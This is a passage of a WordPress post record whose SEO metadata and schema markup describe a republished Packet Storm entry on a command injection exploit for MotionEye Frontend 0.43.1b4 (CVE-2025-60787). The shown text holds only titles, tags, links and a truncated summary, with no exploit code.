Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214899&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-60787&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : MotionEye Frontend...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39065\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T11:50:03+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899\",\"datePublished\":\"2026-02-04T11:50:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065\"},\"wordCount\":2558,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39065#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065\",\"name\":\"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-04T11:50:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39065\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39065#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39065","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:00:15&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214899&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-60787&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : MotionEye Frontend...","og_url":"https:\/\/zero.redgem.net\/?p=39065","og_site_name":"zero redgem","article_published_time":"2026-02-04T11:50:03+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39065#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39065"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899","datePublished":"2026-02-04T11:50:03+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39065"},"wordCount":2558,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39065#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39065","url":"https:\/\/zero.redgem.net\/?p=39065","name":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-04T11:50:03+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39065#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39065"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39065#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39065"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39065\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}